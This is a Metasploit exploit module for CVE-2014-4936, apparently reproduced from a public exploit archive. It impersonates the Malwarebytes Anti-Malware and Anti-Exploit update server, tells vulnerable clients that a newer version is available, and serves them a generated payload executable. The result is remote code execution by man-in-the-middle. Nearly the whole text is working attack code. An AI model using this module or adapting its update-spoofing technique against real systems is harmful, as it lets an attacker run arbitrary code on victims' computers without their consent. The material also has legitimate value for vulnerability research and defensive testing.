Malwarebytes Anti-Malware / Anti-Exploit Update Remote Code Execution

`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::EXE  
include Msf::Exploit::Remote::HttpServer  
  
VERSION_REGEX = /\/v2\/(mbam|mbae)\/consumer\/version.chk/  
EXE_REGEX = /\/v2\/(mbam|mbae)\/consumer\/data\/(mbam|mbae)-setup-(.*)\.exe/  
NEXT_VERSION = { mbam: '2.0.3.1025', mbae: '1.04.1.1012' }  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution',  
'Description' => %q{  
This module exploits a vulnerability in the update functionality of  
Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes  
Anti-Exploit consumer 1.03.1.1220.  
Due to the lack of proper update package validation a man-in-the-middle  
attacker could execute arbitrary code by spoofing the update server  
data-cdn.mbamupdates.com and uploading an executable. This module has  
been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Yonathan Klijnsma', # Vulnerability discovery and PoC  
'Gabor Seljan', # Metasploit module  
'todb' # Module refactoring  
],  
'References' =>  
[  
[ 'CVE', '2014-4936' ],  
[' OSVDB', '116050'],  
[ 'URL', 'http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and'] # Discoverer's blog  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process'  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Windows Universal', {} ]  
],  
'Privileged' => false,  
'DisclosureDate' => 'Dec 16 2014',  
'DefaultTarget' => 0  
))  
  
register_options(  
[  
OptPort.new('SRVPORT', [ true, "The daemon port to listen on (do not change)", 80 ]),  
OptString.new('URIPATH', [ true, "The URI to use (do not change)", "/" ])  
], self.class)  
  
# Vulnerable Malwarebytes clients do not allow altering these.  
deregister_options('SSL', 'SSLVersion', 'SSLCert')  
end  
  
def on_request_uri(cli, request)  
case request.uri  
when VERSION_REGEX  
serve_update_notice(cli) if set_exploit_target($1, request)  
when EXE_REGEX  
serve_exploit(cli)  
else  
vprint_status "Sending empty page for #{request.uri}"  
serve_default_response(cli)  
end  
end  
  
def serve_default_response(cli)  
send_response(cli, '')  
end  
  
def check_client_version(request)  
return false unless request['User-Agent'] =~ /base:(\d+\.\d+\.\d+\.\d+)/  
this_version = $1  
next_version = NEXT_VERSION[:mbam]  
if  
Gem::Version.new(next_version) >= Gem::Version.new(this_version)  
return true  
else  
print_error "Version #{this_version} of Anti-Malware isn't vulnerable, not attempting update."  
return false  
end  
end  
  
def set_exploit_target(package, request)  
case package  
when /mbam/i  
if check_client_version(request)  
@client_software = ['Anti-Malware', NEXT_VERSION[:mbam]]  
else  
serve_default_response(cli)  
return false  
end  
when /mbae/i  
# We don't get identifying info from MBAE  
@client_software = ['Anti-Exploit', NEXT_VERSION[:mbae]]  
end  
end  
  
def serve_update_notice(cli)  
software,next_version = @client_software  
print_status "Updating #{software} to (fake) #{next_version}. The user may need to click 'OK'."  
send_response(cli, next_version,  
'Content-Type' => 'application/octet-stream'  
)  
end  
  
def serve_exploit(cli)  
print_status "Sending payload EXE..."  
send_response(cli, generate_payload_exe,  
'Content-Type' => 'application/x-msdos-program'  
)  
end  
  
end  
`